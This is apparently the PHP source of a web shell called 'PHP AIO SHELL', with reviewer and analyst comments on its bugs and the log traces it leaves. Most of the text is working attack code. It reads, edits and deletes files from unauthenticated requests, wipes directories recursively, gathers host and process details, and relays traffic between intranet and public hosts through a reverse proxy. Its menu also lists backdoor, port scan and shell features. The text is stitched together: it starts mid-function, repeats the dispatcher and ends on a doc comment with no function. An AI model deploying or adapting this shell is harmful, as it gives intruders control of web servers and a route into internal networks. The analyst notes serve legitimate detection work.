		if ($_GET['cmd'] == "shell") {
			aio_shell();
		}
		if ($_GET['cmd'] == "portscan") {
			run_portscan();
		}
		if ($_GET['cmd'] == "proxy") {
			web_proxy_client();
		}
	}
	else {
		echo '<html>
		<body>
		<table border="0" cellpadding="10"  cellspacing="20">
		<tr>
		<td><a href="webshell.php?cmd=showdir">show directorys</a></td>
		<td><a href="webshell.php?cmd=backdoor">connect backdoor</a></td>
		<td><a href="webshell.php?cmd=portscan">port scan</a></td>
		<td><a href="webshell.php?cmd=proxy">reverse proxy</a></td>
		<td><a href="webshell.php?cmd=shell">cmd shell</a></td>
		</tr>
		</body>
		</html>';
	}
}

function aio_main()
{
	$uid = posix_getuid();
	$user_info = posix_getpwuid($uid);

	$uid_banner="uid=".$uid."(".$user_info['name'].") ".
                	"gid=".$user_info['gid']."(".$user_info['name'].") ".
                	"dir=".$user_info['dir']." ".
                	"shell=".$user_info['shell'];

	$uname = posix_uname();

	$uname_banner=$uname['sysname']." ".$uname['nodename']." ".$uname['release']." ".
                	$uname['version']." ".$uname['machine'];

	$server_addr=$_SERVER['SERVER_NAME'];
	$server_port= $_SERVER['SERVER_PORT'];

	$server_time=date("Y/m/d h:i:s",time());
	$phpsoft=$_SERVER['SERVER_SOFTWARE'];
	$php_version=PHP_VERSION;
	$zend_version=zend_version();
	$dis_func=get_cfg_var("disable_functions");
	$safemode=@ini_get('safe_mode');
	if ($safemode == false)
		$safemode="On";
	$cwd_path=getcwd();
	$total_disk=disk_total_space("/");
	$total_disk_gb=intval($total_disk/(1024*1024*1024));
	$free_disk=disk_free_space("/");
	$free_disk_gb=intval($free_disk/(1024*1024*1024));
echo '<html>
<head>
<style>
body
{
background-color:#FFFFFF;
}

ul.banner
{
list-style-type:none;
margin:0;
padding:0;
text-align:center;
color:#384850;
background-color:gray;
font-size:20px;
font-weight:bold;
}

ul.directory
{
font-size:14px;
text-align:left;
font-weight: bold;
}

li
{
display:inline;
}

a:link
{
color:#384850;
}
a:visited
{
color:#384850;
}
a:hover
{
color:#384850;
}
a:active
{
color:#384850;
}

h2.banner
{
text-align:center;
color:#384850;
font-weight:bold;
}

table.banner
{
font-size:14px;
}

tr.banner
{
font-size:16px;
color:#384850;
background-color:gray;
}

tr.directory
{
font-size:14px;
text-align:left;
height:20px;
border:1px solid #98bf21;
padding:2px 6px 2px 6px;
}

p.banner
{
font-size:14px;
}

</style>
</head>

<body>
<h2 class="banner">PHP AIO SHELL</h2>
<hr />
<table class="banner">
<tr>
<td width="1200" >User: '.$uid_banner.'</td>
<td width="200" align="center" >'.$server_time.'</td>
</tr>
<tr>
<td width="1200" >Uname: '.$uname_banner.'</td>
<td width="200" align="center" >'.$server_addr.":".$server_port.'</td>
</tr>
</table>
<hr />

<p class="banner">Software: '.$phpsoft.' | PHP: '.$php_version.' | ZEND: '.$zend_version.'
 | Safemode: '.$safemode.' | disfunc: '.$dis_func.'
</p>

<table class="banner">
<tr>
<td width="200" align="left">Directroy: '.$cwd_path.'</td>
<td width="200" >Disk: total '.$total_disk_gb.'GB free '.$free_disk_gb.'GB </td>
</tr>
</table>
<br />

<ul class="banner">
<li><a href="webshell.php?cmd=dir">[Directorys]</a></li>
<li><a href="webshell.php?cmd=backdoor">[Backdoor]</a></li>
<li><a href="webshell.php?cmd=portscan">[PortScan]</a></li>
<li><a href="webshell.php?cmd=proxy">[Proxy]</a></li>
<li><a href="webshell.php?cmd=shell">[Shell]</a></li>
<li><a href="webshell.php?cmd=crack">[Crack]</a></li>
<li><a href="webshell.php?cmd=mysql">[Mysql]</a></li>
</ul>
<br />

</body>
</html>';

        if ($_GET['cmd']) {
		if ($_GET['cmd'] == "dir") {
			aio_directory();
		}
                if ($_GET['cmd'] == "backdoor") {
                        run_backdoor();
                }
                if ($_GET['cmd'] == "shell") {
                        aio_shell();
                }
                if ($_GET['cmd'] == "portscan") {
                        run_portscan();
                }
                if ($_GET['cmd'] == "proxy") {
                        web_proxy_client();
                }
        }

	if ($_GET['delete']) {
		delete_file($_GET['delete']);	
	}
	if ($_GET['edit']) {
		edit_file($_GET['edit']);
	}
}

aio_main();
?>


Original Code

<?php

session_start();
error_reporting(E_ALL);

/**
 * Echo a file's contents to the response, chunk by chunk.
 *
 * @file_name - path passed to fopen() as given; this function applies no
 *              path restriction of its own.
 *
 * Returns 0 after the file has been streamed, -1 if it cannot be opened.
 */
function read_file($file_name)
{
	$fp = fopen($file_name, "r");
	if ($fp == false) {
		echo "open $file_name failed.\n";
		return -1;
	}

	// fgets() returns at most 1023 bytes per call. The loose `!= false` test
	// also stops on a chunk PHP treats as falsy (e.g. a last line "0").
	// The data is written to the page without HTML encoding.
	while (($buf = fgets($fp, 1024)) != false ) {
		echo $buf;
	}
	
	fclose($fp);
	return 0;
}

/**
 * Copy a file by reading it with fgets() and writing each chunk with fwrite().
 *
 * @src_file - path opened for reading.
 * @dst_file - path opened with "w+", which creates the file or truncates an
 *             existing one.
 *
 * Returns 0 on success, -1 if either file cannot be opened or a write fails.
 * Neither path is validated or restricted here.
 */
function copy_file($src_file, $dst_file)
{
	$src_fp = fopen($src_file, "r");
	if ($src_fp == false) {
		echo "open $src_file failed.\n";
		return -1;
	}

	// Unlike the source-open failure, this branch reports nothing.
	$dst_fp = fopen($dst_file, "w+");
	if ($dst_fp == false) {
		fclose($src_fp);
		return -1;
	}

	// Up to 1023 bytes per iteration; the loose `!= false` test ends the
	// copy early on a chunk that evaluates as falsy (e.g. a last line "0").
	while (($buf = fgets($src_fp, 1024)) != false) {
		if (fwrite($dst_fp, $buf, strlen($buf)) == false) {
			echo "fwrite failed.\n";
			fclose($src_fp);
			fclose($dst_fp);
			return -1;
		}
	}

	fclose($src_fp);
	fclose($dst_fp);
	return 0;
}

/**
 * Copy a file with PHP's copy(), after checking that the source exists.
 *
 * @src_file - existing source path.
 * @dst_file - destination path handed to copy().
 *
 * Returns 0 on success, -1 if the source is missing or copy() fails.
 * A status line is echoed in every case.
 */
function copy_file_binary($src_file, $dst_file)
{
	if (file_exists($src_file) == false) {
		echo "file $src_file not exist.\n";
		return -1;
	}

	if (copy($src_file, $dst_file) == false) {
		// NOTE(review): $src is not defined in this function, so the
		// source name is missing from this message.
		echo "copy $src to $dst_file failed.\n";
		return -1;
	}
	echo "copy $src_file to $dst_file ok.\n";

	return 0;
}

/**
 * Delete a single file with unlink().
 *
 * @file_name - path to remove. The dispatcher at the end of aio_main()
 *              passes $_GET['delete'] here unchanged, so the path comes
 *              straight from the request with no validation.
 *
 * Returns 0 on success, -1 if the file is missing or unlink() fails.
 *
 * Analyst note: a `delete=` query parameter on requests to this script in
 * the web access log corresponds to a call of this function.
 */
function delete_file($file_name)
{
	if (file_exists($file_name) == false) {
		echo "file $file_name not exist.";
		return -1;
	}

	if (unlink($file_name) == false) {
		echo "delete $file_name failed.";
		return -1;
	}
	// The request-supplied name is echoed without HTML encoding.
	echo "delete $file_name ok.\n";

	return 0;
}

/**
 * Show a file in an edit form, or overwrite it with posted content.
 *
 * @file_path - requested path; only its basename() is used, so the file is
 *              resolved relative to the script's current working directory.
 *
 * Without a non-empty $_POST['newcontent'] the file is read and placed in a
 * textarea. With it, the file is opened "w+" (create or truncate) and the
 * posted bytes are written. Nothing is returned.
 *
 * Analyst note: this is an unauthenticated write primitive for files in the
 * working directory; file-integrity monitoring of that directory is what
 * would surface its use.
 */
function edit_file($file_path)
{
	$file_name = basename($file_path);

	// empty() is also true for the string "0", which therefore shows the
	// form instead of being written.
	if (empty($_POST['newcontent'])) {
		echo '<form action="" method="post">';

		// `@` hides open/read errors, e.g. for a missing file.
		$fp=@fopen($file_name, "r");
		$data=@fread($fp, filesize($file_name));
	
		echo '<textarea name="newcontent" cols="80" rows="20" >';
		// File contents are emitted without HTML encoding.
		echo $data;
		@fclose($fp);
		echo '</textarea>
		<input type="submit" value="Edit"/>
		</form>';
	}
	else {
		$fp=@fopen($file_name, "w+");
		$result=@fwrite($fp, $_POST['newcontent']);
		@fclose($fp);
		if ($result == false) {
			echo "edit failed.";
		}
		else {
			echo "edit ok.";
		}
	}

}

/**
 * Rename (or move) a file with rename(), after checking that it exists.
 *
 * @old_file_name - existing path.
 * @new_file_name - target path.
 *
 * Returns 0 on success, -1 if the source is missing or rename() fails.
 * No caller is visible on this page; the "Rename" link built in read_dirs()
 * has no matching branch in the dispatcher shown.
 */
function rename_file($old_file_name, $new_file_name)
{
	if (file_exists($old_file_name) == false) {
		echo "file $old_file_name not exist.\n";
		return -1;
	}

	if (rename($old_file_name, $new_file_name) == false) {
		echo "rename $old_file_name to $new_file_name failed.\n";
		return -1;
	}

	echo "rename $old_file_name to $new_file_name ok.\n";
	return 0;
}

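/**
 * Format a byte count as a whole number followed by a unit.
 *
 * @bytes - size in bytes (int or float).
 *
 * Returns a string such as "512 Bytes" or "3 MB". The value is divided by
 * 1024 until it drops below 1024 or the largest unit (TB) is reached; the
 * fractional part is truncated by intval().
 */
function get_human_size($bytes)
{
	$type=array("Bytes", "KB", "MB", "GB", "TB");
	$last_idx=count($type) - 1;
	$idx=0;

	// Stop at the last unit so that very large values cannot index past the
	// end of $type; they are reported as a multiple of TB instead.
	while ($bytes >= 1024 && $idx < $last_idx) {
		$bytes /= 1024;
		$idx++;
	}

	return (intval($bytes)." ".$type[$idx]);
}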

/**
 * Return a file's permission bits as four octal digits, e.g. "0644".
 *
 * @file_name - path handed to fileperms().
 */
function get_file_perms($file_name)
{
	$mode_octal = sprintf('%o', fileperms($file_name));

	// The leading digits of the mode carry the file type; keep the last four.
	return substr($mode_octal, -4);
}


/**
 * Render a file's mode as an `ls -l` style string such as "-rw-r--r--".
 *
 * @file_name - path handed to fileperms().
 *
 * The first character is the file type, followed by three read/write/execute
 * triplets in which the setuid, setgid and sticky bits replace the execute
 * letter.
 */
function get_human_file_perms($file_name)
{
	$perms = fileperms($file_name);

	// File-type masks, tested in this order; the first mask whose bits are
	// all set in the mode decides the type letter.
	$type_masks = array(
		0xC000 => 's',
		0xA000 => 'l',
		0x8000 => '-',
		0x6000 => 'b',
		0x4000 => 'd',
		0x2000 => 'c',
		0x1000 => 'p',
	);

	$info = 'u';
	foreach ($type_masks as $mask => $letter) {
		if (($perms & $mask) == $mask) {
			$info = $letter;
			break;
		}
	}

	// One row per triplet: read bit, write bit, execute bit, special bit,
	// then the letter used when the special bit is set with / without execute.
	$triplets = array(
		array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'),
		array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'),
		array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'),
	);

	foreach ($triplets as $row) {
		list($read_bit, $write_bit, $exec_bit, $special_bit, $with_exec, $without_exec) = $row;

		$info .= ($perms & $read_bit) ? 'r' : '-';
		$info .= ($perms & $write_bit) ? 'w' : '-';

		if ($perms & $exec_bit) {
			$info .= ($perms & $special_bit) ? $with_exec : 'x';
		} else {
			$info .= ($perms & $special_bit) ? $without_exec : '-';
		}
	}

	return $info;
}

/**
 * Resolve the account name that owns a file.
 *
 * @file_name - path handed to fileowner().
 *
 * Returns the 'name' field of the passwd entry for the owning uid.
 */
function get_file_owner($file_name)
{
	$owner_entry = posix_getpwuid(fileowner($file_name));

	return $owner_entry['name'];
}

/**
 * Print the path of every entry directly inside a directory (no recursion).
 *
 * @dir_path - directory to list.
 *
 * Returns 0, or -1 if the directory cannot be opened.
 */
function read_dir($dir_path)
{
	if (is_dir($dir_path)) {
		if (($dp = opendir($dir_path)) == false) {
			echo "open $dir_path failed.\n";
			return -1;
		}
		// The loose `!= false` test also stops at an entry named "0".
		while (($file_name = readdir($dp)) != false) {
			if ($file_name == "." || $file_name == "..")
				continue;
			$sub_path = $dir_path."/".$file_name;
			echo "$sub_path\n";
		}
	}

	// NOTE(review): reached even when $dir_path is not a directory, in
	// which case $dp was never assigned.
	closedir($dp);
	return 0;
}

/**
 * Render the file-manager table for a directory: name, timestamp, size,
 * permissions/owner and per-file action links.
 *
 * @dir_path - directory to list.
 *
 * Returns 0, or -1 if the directory cannot be opened.
 *
 * Analyst note: the action links are hard-coded to `webshell.php` with the
 * query parameters `delete`, `edit`, `download` and `rename`; those strings
 * are usable when searching web access logs and file contents. Only `delete`
 * and `edit` have a matching branch in the dispatcher shown on this page.
 */
function read_dirs($dir_path)
{
	echo '
<table>
<tr class="banner">
<td width="400" >Filename</td>
<td width="400" >Last modified</td>
<td width="400" >Size</td>
<td width="400" >Chmod/Perms</td>
<td width="400" >Action</td>
</tr>';

        if (is_dir($dir_path)) {
                if (($dp = opendir($dir_path)) == false) {
                        echo "open $dir_path failed.\n";
                        return -1;
                }
                while (($file_name = readdir($dp)) != false) {
                        if ($file_name == "." || $file_name == "..")
                                continue;
                        // $sub_path is built but not used below: every stat call
                        // takes the bare entry name, so the values are only right
                        // when $dir_path is the current working directory.
                        $sub_path = $dir_path."/".$file_name;
			// The "Last modified" column is filled from the access time.
			$last_modify_time=date("Y/m/d H:i:s", fileatime($file_name));
			$file_size=filesize($file_name);
			$file_size_string=get_human_size($file_size);
			$file_perms=get_file_perms($file_name);
			$file_perms_string=get_human_file_perms($file_name);
			$file_owner=get_file_owner($file_name);
			
			// File names go into the markup and the link targets without
			// HTML or URL encoding.
			echo '<tr class="directory">
			<td width="400" ><a href='.$file_name.'>'.$file_name.'</a></td>
			<td width="400" >'.$last_modify_time.'</td>
			<td width="400" >'.$file_size_string.'</td>
			<td width="400" >'.$file_perms.' / '.$file_perms_string.' / '.$file_owner.'</td>
			<td width="400" ><a href="webshell.php?delete='.$file_name.'"'.'>Delete </a>
				<a href="webshell.php?edit='.$file_name.'"'.'>Edit </a>
				<a href="webshell.php?download='.$file_name.'"'.'>Download </a>
				<a href="webshell.php?rename='.$file_name.'"'.'>Rename </a>
			</td>
			</tr>';

                }
        }

	echo '</table>';

        // NOTE(review): $dp is unset here when $dir_path is not a directory.
        closedir($dp);
        return 0;
}

/**
 * Handler for `cmd=dir`: render the file-manager table for the script's
 * current working directory.
 *
 * Returns whatever read_dirs() returns (0 or -1).
 */
function aio_directory()
{
	$curr_path=getcwd();

	return read_dirs($curr_path);
}


/**
 * Walk a directory tree looking for an entry with an exact name.
 *
 * @dir_path    - directory to start from.
 * @target_file - entry name compared with strcmp().
 *
 * Returns 0 when the name is found directly in $dir_path, otherwise -1.
 * No caller is visible on this page.
 */
function search_file_by_name($dir_path, $target_file)
{
        if (is_dir($dir_path)) {
                if (($dp = opendir($dir_path)) == false) {
                        echo "open $dir_path failed.\n";
                        return -1;
                }
                while (($file_name = readdir($dp)) != false) {
                        if ($file_name == "." || $file_name == "..")
                                continue;

                        $sub_path = $dir_path."/".$file_name;
                        if (is_dir($sub_path)) {
                                // The recursive result is discarded, so a hit in a
                                // subdirectory is printed but does not stop the walk
                                // or change this call's return value.
                                search_file_by_name($sub_path, $target_file);
                        }

			if (!strcmp($file_name, $target_file)) {
				echo "found $target_file.\n";
				closedir($dp);
				return 0;
			}
                }

		// Printed once for every directory that lacks the name.
		echo "not found $target_file.\n";
        	closedir($dp);
        }

        return -1;
}

/**
 * Recursively print the entries that pass an access check chosen by a flag.
 *
 * @dir_path - directory to search.
 * @attr_flag - 0 readable.
 *            - 1 writable.
 *            - 2 executable.
 *
 * Always returns 0 once the directory has been opened; -1 if opendir() fails.
 * An unknown flag prints an error and stops the loop for that directory.
 * No caller is visible on this page.
 */
function show_attr_file($dir_path, $attr_flag)
{
        if (is_dir($dir_path)) {
                if (($dp = opendir($dir_path)) == false) {
                        echo "open $dir_path failed.\n";
                        return -1;
                }
                while (($file_name = readdir($dp)) != false) { 
                        if ($file_name == "." || $file_name == "..")
                                continue;

                        $sub_path = $dir_path."/".$file_name;
                        if (is_dir($sub_path)) {
                                show_attr_file($sub_path, $attr_flag);
                        }
		
			// The checks below test the bare entry name, not $sub_path,
			// so they are evaluated relative to the working directory
			// while the path printed is $sub_path.
			if ($attr_flag == 0) {
				if (is_readable($file_name)) 
					echo "$sub_path\n";
			}
			else if ($attr_flag == 1) {
				if (is_writable($file_name)) 
					echo "$sub_path\n";
			}
			else if ($attr_flag == 2) {
				if (is_executable($file_name)) 
					echo "$sub_path\n";
			}
			else {
				echo "wrong attribute flag.\n";
				break;
			}
		}
		closedir($dp);
	}

	return 0;
}

/**
 * Create a directory with mode 0700 (owner-only access).
 *
 * @dir_path - directory to create.
 *
 * Returns 0 on success, -1 if the path already exists (silently) or
 * mkdir() fails.
 */
function create_dir($dir_path)
{
	if (file_exists($dir_path))
		return -1;

	if (mkdir($dir_path, 0700) == false) {
		echo "create $dir_path failed.\n";
		return -1;
	}
	echo "create $dir_path ok.\n";
	return 0;
}

/**
 * Remove a single directory with rmdir().
 *
 * @dir_path - directory to remove.
 *
 * Returns 0 on success, -1 if the path is missing (silently) or rmdir()
 * fails.
 */
function destroy_dir($dir_path)
{
	if (file_exists($dir_path) == false)
		return -1;

	if (rmdir($dir_path) == false) {
		echo "delete $dir_path failed.\n";
		return -1;
	}

	echo "delete $dir_path ok.\n";
	return 0;
}

/**
 * Recursively delete a directory tree: files through delete_file(),
 * subdirectories through a recursive call, then the directory itself.
 *
 * @dir_path - root of the tree to remove.
 *
 * Returns 0 whether or not anything was removed, -1 only if opendir() fails.
 * Results of the individual delete calls are not checked. No caller is
 * visible on this page.
 */
function destroy_dirs($dir_path)
{
        if (is_dir($dir_path)) {
                if (($dp = opendir($dir_path)) == false) {
                        echo "open $dir_path failed.\n";
                        return -1;
                }
                while (($file_name = readdir($dp)) != false) {
                        if ($file_name == "." || $file_name == "..")
                                continue;
                        $sub_path = $dir_path."/".$file_name;

                        if (is_dir($sub_path)) {
                                destroy_dirs($sub_path);
                        }
			else
				delete_file($sub_path);
                }

        	closedir($dp);
		destroy_dir($dir_path);
        	return 0;
        }

        return 0;
}

/**
 * Print an `id`-like line for the account the PHP process runs as:
 * uid, gid, home directory and login shell from the passwd entry.
 */
function linux_id()
{
	$uid = posix_getuid();
	$user_info = posix_getpwuid($uid);

	echo "uid=".$uid."(".$user_info['name'].") ";
	// The gid is labelled with the user name; no group lookup is made.
	echo "gid=".$user_info['gid']."(".$user_info['name'].") ";
	echo "dir=".$user_info['dir']." ";
	echo "shell=".$user_info['shell']."\n";
}

/**
 * Print the host's system name, node name, kernel release, version and
 * machine type as returned by posix_uname().
 */
function linux_uname()
{
	$uname = posix_uname();

	echo $uname['sysname']." ".$uname['nodename']." ".$uname['release']." ";
	echo $uname['version']." ".$uname['machine'];
}

/**
 * Extract the second whitespace-separated field of the first line that
 * contains "Name:" in a file; linux_ps() passes /proc/<pid>/status.
 *
 * @file_name - file to scan.
 *
 * Returns the name string, 0 if no such line exists, -1 if the file cannot
 * be opened.
 */
function get_proc_name($file_name)
{
        $fp = fopen($file_name, "r");
        if ($fp == false) {
                echo "open $file_name failed.\n";
                return -1;
        }

        while (($buf = fgets($fp, 1024)) != false ) {
		// strstr() yields false when the marker is absent; the loose
		// comparison with NULL treats that as "no match".
		if (strstr($buf, "Name:") != NULL) {
			// With extra arguments sscanf() stores the fields in them.
			sscanf($buf, "%s %s", $tmp, $name);
			fclose($fp);
			return $name;
		}
        }

        fclose($fp);
        return 0;
}

/**
 * Return the first fgets() chunk (at most 1023 bytes) of a file;
 * linux_ps() passes /proc/<pid>/cmdline.
 *
 * @file_name - file to read.
 *
 * Returns the chunk, false if the file is empty, -1 if it cannot be opened.
 */
function get_proc_cmd($file_name)
{
        $fp = fopen($file_name, "r");
        if ($fp == false) {
                echo "open $file_name failed.\n";
                return -1;
        }

	$cmd = fgets($fp, 1024);
	fclose($fp);

	return $cmd;
}

/**
 * Print a process list by walking the numeric entries of /proc and reading
 * each one's status and cmdline files. Uses only file reads, so it does not
 * depend on command execution being available.
 *
 * Returns 0, or -1 if /proc cannot be opened. No caller is visible on this
 * page.
 */
function linux_ps()
{
	if (($dp = opendir("/proc")) == false) {
		echo "open /proc failed.\n";
		return -1;
	}
	echo "open /proc ok.\n";

        while (($file_name = readdir($dp)) != false) {
        	if ($file_name == "." || $file_name == "..")
        		 continue;

		// Only all-digit entries (process ids) are inspected.
		if (ctype_digit($file_name) == false)
			continue;
		
		$dir_path = "/proc/$file_name/status";
		$proc_name = get_proc_name($dir_path);

		$dir_path = "/proc/$file_name/cmdline";
		$proc_cmd = get_proc_cmd($dir_path);

		echo $file_name."\t\t".$proc_name." ".$proc_cmd."\n";
	}

	closedir($dp);
	return 0;
}

/**
 * Open a blocking IPv4 TCP connection with the sockets extension.
 *
 * @host - address handed to socket_connect().
 * @port - destination port.
 *
 * Returns the connected socket, or -1 on failure. Connection errors are
 * suppressed with `@`, so a failure leaves no PHP warning behind.
 */
function tcp_connect($host, $port)
{
	$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
	if ($socket == false) {
		echo "create socket error.\n";
		return -1;
	}

	if (@socket_connect($socket, $host, $port) == false) {
		socket_close($socket);
		return -1;
	}

	return $socket;
}

/**
 * Open an IPv4 TCP connection in non-blocking mode, retrying once a second
 * until it succeeds or a deadline passes.
 *
 * @host    - address handed to socket_connect().
 * @port    - destination port.
 * @timeout - deadline in whole seconds, measured with time().
 *
 * Returns the socket (left in non-blocking mode) or -1 on failure or
 * timeout. No caller is visible on this page.
 */
function tcp_connect_timeout($host, $port, $timeout)
{
	$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
	if ($socket == false) {
		echo "create socket error.\n";
		return -1;
	}

	if (socket_set_nonblock($socket) == false) {
		echo "set nonblock error.\n";
		socket_close($socket);
		return -1;
	}

	$time = time();
	while (!@socket_connect($socket, $host, $port)) {
		$err = socket_last_error($socket);
		// 115 and 114 are the Linux errno values EINPROGRESS and
		// EALREADY: the connect is still pending, so wait and retry.
		if ($err == 115 || $err == 114) {
			if ((time() - $time) >= $timeout) {
				socket_close($socket);
				echo "socket timeout.\n";
				return -1;
			}
			sleep(1);
			continue;
		}
		// Any other error is treated as final.
		socket_close($socket);
		return -1;
	}
	
	echo "connect to $host:$port ok.\n";
	return $socket;
}

/**
 * Open two outbound TCP connections and relay traffic between them.
 *
 * @remote_host1, @remote_port1 - first endpoint (web_proxy_client() passes
 *                                the "intranet" form fields here).
 * @remote_host2, @remote_port2 - second endpoint (the "public" form fields).
 *
 * Returns 0 when the relay ends, -1 if either connection fails.
 *
 * Analyst note: both legs are initiated by the web server, so on the
 * network this appears as the PHP worker holding one connection to an
 * internal address and one to an external address at the same time.
 */
function run_proxy_client($remote_host1, $remote_port1, $remote_host2, $remote_port2)
{
        $socket1 = tcp_connect($remote_host1, $remote_port1);
        if ($socket1 == -1) {
                echo "connect to $remote_host1:$remote_port1 failed.\n";
                return -1;
        }
        echo "connect to $remote_host1:$remote_port1 ok.\n";

        $socket2 = tcp_connect($remote_host2, $remote_port2);
        if ($socket2 == -1) {
                echo "connect to $remote_host2:$remote_port2 failed.\n";
                socket_close($socket1);
                return -1;
        }
        echo "connect to $remote_host2:$remote_port2 ok.\n";

        // Blocks until the relay loop ends; both sockets are closed there.
        run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2);

        return 0;
}

/**
 * Handler for `cmd=proxy`: print the "Linux reverse proxy" form and, when
 * all four fields are posted, start the relay.
 *
 * Reads $_POST['intranet_host'], ['intranet_port'], ['public_host'] and
 * ['public_port'] and passes them to run_proxy_client() unvalidated.
 *
 * Returns -1 when a field is missing or empty; otherwise nothing.
 *
 * Analyst note: these four POST field names, together with `cmd=proxy` in
 * the query string, identify use of this feature in request logs or in a
 * WAF that records POST bodies.
 */
function web_proxy_client()
{
        echo '<html><head><style>
                h3.banner
                {
                text-align:center;
                color:#384850;
                font-weight:bold;
                }
                form
                {
                text-align:center;
                }
                input[type=text]
                {
                width:300px;
                color:#384850;
                background-color:#ffffff;
                }
                input[type=submit]
                {
                width:80px;
                color:#384850;
                background-color:#ffffff;
                }
                </head></style>
                <body>
		<h3 class="banner">Linux reverse proxy</h3>
                <form action="" method="post">
		<b>intranet host</b>
                <input type="text" name="intranet_host" />
                <b>intranet port</b>
                <input type="text" name="intranet_port" /><br />
		<b>public host</b>
                <input type="text" name="public_host" />
                <b>public   port</b>
                <input type="text" name="public_port" /><br /><br />
                <input type="submit" value="Run" />
                </form>
                </body>
                </html>';

        if (empty($_POST['intranet_host']) || empty($_POST['intranet_port']) || 
		empty($_POST['public_host']) ||  empty($_POST['public_port']))
                return -1;

	// The HTTP request stays open for as long as the relay runs.
	run_proxy_client($_POST['intranet_host'], $_POST['intranet_port'],
			$_POST['public_host'], $_POST['public_port']);
}

/**
 * Relay bytes in both directions between two connected sockets until either
 * side closes or an error occurs, then close both sockets.
 *
 * @socket1, @socket2           - connected sockets.
 * @remote_host1, @remote_host2 - labels used only in status messages.
 *
 * Always returns 0.
 *
 * Analyst note: socket_select() is called with a zero timeout, so it returns
 * immediately and the loop polls continuously; a worker running this relay
 * would presumably show sustained CPU use while the connection is idle.
 */
function run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2)
{
        while (true) {
                $read_sockets = array($socket1, $socket2);
                $write_sockets = NULL;
                $except_sockets = NULL;

                // NOTE(review): $except is passed here, not the
                // $except_sockets variable assigned just above.
                if (socket_select($read_sockets, $write_sockets, $except, 0) == -1) {
                        echo "socket_select error ".socket_strerror(socket_last_error())."\n";
                        break;
                }

                if (in_array($socket2, $read_sockets)) {
                        //echo "got data from $remote_host2.\n";

                        // Up to 1024 bytes per pass. The loose `== false` test is
                        // true for both an error and a 0-byte read (peer closed),
                        // so the `== 0` branch below is never reached.
                        $bytes2 = socket_recv($socket2, $buf2, 1024, MSG_DONTWAIT);
                        if ($bytes2 == false) {
                                echo "socket_recv ".socket_strerror(socket_last_error($socket2))."\n";
                                break;
                        }
                        //echo "got bytes $bytes2.\n";

                        if ($bytes2 == 0) {
                                echo "recv no data from $remote_host2.\n";
                                break;
                        }

                        $ret2 = socket_send($socket1, $buf2, $bytes2, MSG_EOR);
                        if ($ret2 == false) {
                                echo "socket_send ".socket_strerror(socket_last_error($socket1))."\n";
                                break;
                        }
                        // A short write ends the relay; there is no retry.
                        if ($ret2 != $bytes2) {
                                echo "send data failed.\n";
                                break;
                        }
                        //echo "write $ret2 bytes ok.\n";
                }
                // Same steps for the opposite direction.
                if (in_array($socket1, $read_sockets)) {
                        //echo "got data from $remote_host1.\n";

                        $bytes1 = socket_recv($socket1, $buf1, 1024, MSG_DONTWAIT);
                        if ($bytes1 == false) {
                                echo "socket_recv ".socket_strerror(socket_last_error($socket1))."\n";
                                break;
                        }
                        //echo "got bytes $bytes1.\n";

                        if ($bytes1 == 0) {
                                echo "recv no data from $remote_host1.\n";
                                break;
                        }

                        $ret1 = socket_send($socket2, $buf1, $bytes1, MSG_EOR);
                        if ($ret1 == false) {
                                echo "socket_send ".socket_strerror(socket_last_error($socket2))."\n";
                                break;
                        }
                        if ($ret1 != $bytes1) {
                                echo "send data failed.\n";
                                break;
                        }
                        //echo "write $ret1 bytes ok.\n";
                }
        }

        echo "proxy done.\n";
        socket_close($socket1);
        socket_close($socket2);

        return 0;
}

/**
 * Create an IPv4 TCP socket, bind it to a local port and start listening.
 *
 * @local_port - port to listen on.
 *
 * Returns the listening socket, or -1 if create, bind or listen fails.
 *
 * Analyst note: a new listening port owned by the web server or PHP worker
 * process is the host-side artefact of this call.
 */
function init_proxy_server($local_port)
{
        $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
        if ($socket == false) {
                echo "create socket error.\n";
                return -1;
        }

        // Bind address is the literal '0' — presumably equivalent to
        // 0.0.0.0 (all interfaces); confirm on the target platform.
        if (socket_bind($socket, '0', $local_port) == false) {
                echo "bind sock error.\n";
                socket_close($socket);
                return -1;
        }

        if (socket_listen($socket) == false) {
                echo "listen sock error.\n";
                socket_close($socket);
                return -1;
        }
        echo "listen on port $local_port ok.\n";

        return $socket;
}


/**
 * Listen on two local ports, accept one client on each in turn, and relay
 * traffic between the two accepted connections.
 *
 * @local_port1 - first port; its client must connect before the second
 *                listener is created.
 * @local_port2 - second port.
 *
 * Returns 0 when the relay ends, -1 if a listener cannot be set up.
 * No caller is visible on this page.
 */
function run_proxy_server($local_port1, $local_port2)
{
        $socket1 = init_proxy_server($local_port1);
        if ($socket1 == -1)
                return -1;

        while (true) {
                if (($newsock1 = socket_accept($socket1)) !== false) {
                        socket_getpeername($newsock1, $ip1);
                        echo "got a client form $ip1\n";
                        break;
                }
        }
        // NOTE(review): if this second listener fails, the first listener
        // and its accepted client are left open.
        $socket2 = init_proxy_server($local_port2);
        if ($socket2 == -1)
                return -1;

        while (true) {
                if (($newsock2 = socket_accept($socket2)) !== false) {
                        socket_getpeername($newsock2, $ip2);
                        echo "got a client form $ip2\n";
                        break;
                }
        }

        echo "start transmit data ...\n";
        // The accepted sockets are closed inside run_proxy_core().
        run_proxy_core($newsock2, $ip2, $newsock1, $ip1);

        socket_close($socket2);
        socket_close($socket1);

        return 0;
}

/**
 * Try to open a TCP connection with fsockopen().
 *
 * @host    - target host.
 * @port    - target port.
 * @timeout - connect timeout in seconds.
 *
 * Returns the stream on success or false on failure. Errors are suppressed
 * with `@`, and $errno / $errstr are discarded.
 */
function tcp_connect_port($host, $port, $timeout)
{
	$fp = @fsockopen($host, $port, $errno, $errstr, $timeout);
		
	return $fp;
}

/**
 * Probe a fixed table of well-known service ports on one host and print a
 * table row for each port that accepts a TCP connection.
 *
 * @host    - target host, taken from the request by run_portscan().
 * @timeout - per-port connect timeout in seconds.
 * @banner  - when non-empty, up to 127 bytes are read from each open port
 *            and shown in a fourth column.
 *
 * Returns nothing.
 *
 * Analyst note: ports are tried one after another from the web server's own
 * address, so flow logs show a burst of short connections from that host to
 * a single destination. $host and the banner text received from the remote
 * service are written into the page without HTML encoding.
 */
